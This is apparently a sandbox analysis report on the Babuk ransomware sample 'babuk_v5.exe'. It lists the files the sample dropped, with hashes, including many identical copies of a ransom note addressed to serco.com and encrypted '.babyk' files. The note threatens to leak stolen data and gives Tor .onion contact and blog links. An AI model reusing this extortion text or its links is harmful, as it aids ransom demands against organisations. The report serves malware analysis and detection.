                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!006\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Extensions\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\History\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\History\container.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.493657916904638
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlJ0vjOguA1+t71yWSP/0B4Pt7ykXblxW2+UchjtygnVAsP4XwIDf/l8LUxNvEEn:2CguZwWbU3XW2+agnVBu58L0vtn
                                                                            MD5:E8E45B7AC16CA6F71E6E82D9138375FF
                                                                            SHA1:A80D50DD9B6669DB60E8128B3A00C7AABAC693AF
                                                                            SHA-256:8C7E1671D284B193E6DA51010C702208D22B007AA0AA3931D8B6C008B8FC6441
                                                                            SHA-512:0D7C965DB42D83C0DC8969EF51C0D042073627F8E5483B96BDFF1BF339526DAA91791C6E399BFB798C3CD257ADFD4C937B267FB2DB720B6202AEE73240E210BD
                                                                            Malicious:false
                                                                            Preview: ....T..8.......x.7m..........W..6.Q@..brfw.2..q.xn..F..W=R..Zh.o.d0"kE...6.x.>...W..-G..G;...E........Lh.......B J..N.rl.2{F..i.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\PlayReady\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\PlayReady\InPrivate\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\UrlBlock\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\BrowserImport\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DNTException\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DNTException\container.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.569218167198455
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            Preview: ......%.....5..+....M..Z..@..........R....zo.&mc...9.....Cq......r.@2.nI!...eL.;..2...~..g:.,..>-,..A.uZ=.....K..SS..J..a.\L%cd....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
